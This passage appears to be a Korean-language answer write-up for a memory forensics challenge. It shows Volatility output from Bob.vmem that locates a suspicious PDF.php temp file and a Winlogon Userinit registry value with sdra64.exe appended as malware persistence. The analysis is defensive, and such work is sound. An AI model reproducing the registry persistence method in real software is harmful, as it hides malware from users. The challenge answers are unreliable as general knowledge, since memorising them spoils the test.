File \Program Files\Adobe\Acrobat 6.0\Resource\Font
File \Program Files\Adobe\Acrobat 6.0\Resource\CMap
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr10C.tmp
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr110.tmp
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \Documents and Settings\Administrator\Application Data\AdobeUM
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
File \Documents and Settings\Administrator\Cookies\index.dat
File \Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
File \Endpoint
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \ROUTER
File \ROUTER
File \Endpoint
File \AsyncConnectHlp
위 목록에서 DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php 경로의 파일을 확인할 수 있다.
8. If any suspicious files can be extracted from an injected process, do any anti-virus products pick up the suspicious executable? What is the general result from anti-virus products? (6pts)
파일이 추출이 가능한가? 음.
9. Are there any related registry entries associated with the payload? (4pts)
레지스트리는 Volatility 플러그인을 이용하여 풀 수 있다. 아래 경로에서 Memory Registry Tools 을 받도록 하자.
http://moyix.blogspot.com/2009/01/memory-registry-tools.html
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivescan -f Bob.vmem
Offset (hex)
44658696 0x2a97008
44686176 0x2a9db60
48529416 0x2e48008
55269896 0x34b5a08
57399112 0x36bd748
59082008 0x3858518
70588752 0x4351950
111029088 0x69e2b60
114539360 0x6d3bb60
121604960 0x73f8b60
180321120 0xabf7b60
191408992 0xb68ab60
244959264 0xe99c820
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivelist -f Bob.vmem -o 0x2a97008
Address Name
0xe1d6cb60 \Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1de0b60 \Documents and Settings\Administrator\NTUSER.DAT
0xe1769b60 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17deb60 \Documents and Settings\LocalService\NTUSER.DAT
0xe1797b60 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17a3820 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1526748 \WINDOWS\system32\config\software
0xe15a3950 \WINDOWS\system32\config\default
0xe151ea08 \WINDOWS\system32\config\SAM
0xe153e518 \WINDOWS\system32\config\SECURITY
0xe139d008 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility printkey -f Bob.vmem -o 0xe1526748 "Microsoft\Windows NT\CurrentVersion\Winlogon"
Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010
Subkeys:
GPExtensions (Stable)
Notify (Stable)
SpecialAccounts (Stable)
Credentials (Volatile)
Values:
REG_DWORD AutoRestartShell : 1 (Stable)
REG_SZ DefaultDomainName : BOB-DCADFEDC55C (Stable)
REG_SZ DefaultUserName : Administrator (Stable)
REG_SZ LegalNoticeCaption : (Stable)
REG_SZ LegalNoticeText : (Stable)
REG_SZ PowerdownAfterShutdown : 0 (Stable)
REG_SZ ReportBootOk : 1 (Stable)
REG_SZ Shell : Explorer.exe (Stable)
REG_SZ ShutdownWithoutLogon : 0 (Stable)
REG_SZ System : (Stable)
REG_SZ Userinit : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_SZ VmApplet : rundll32 shell32,Control_RunDLL "sysdm.cpl" (Stable)
REG_DWORD SfcQuota : 4294967295 (Stable)
REG_SZ allocatecdroms : 0 (Stable)
REG_SZ allocatedasd : 0 (Stable)
REG_SZ allocatefloppies : 0 (Stable)
REG_SZ cachedlogonscount : 10 (Stable)
REG_DWORD forceunlocklogon : 0 (Stable)
REG_DWORD passwordexpirywarning : 14 (Stable)
REG_SZ scremoveoption : 0 (Stable)
REG_DWORD AllowMultipleTSSessions : 1 (Stable)
REG_EXPAND_SZ UIHost : logonui.exe (Stable)
REG_DWORD LogonType : 1 (Stable)
REG_SZ Background : 0 0 0 (Stable)
REG_SZ AutoAdminLogon : 0 (Stable)
REG_SZ DebugServerCommand : no (Stable)
REG_DWORD SFCDisable : 0 (Stable)
REG_SZ WinStationsDisabled : 0 (Stable)
REG_DWORD HibernationPreviouslyEnabled : 1 (Stable)
REG_DWORD ShowLogonOptions : 0 (Stable)
REG_SZ AltDefaultUserName : Administrator (Stable)
REG_SZ AltDefaultDomainName : BOB-DCADFEDC55C (Stable)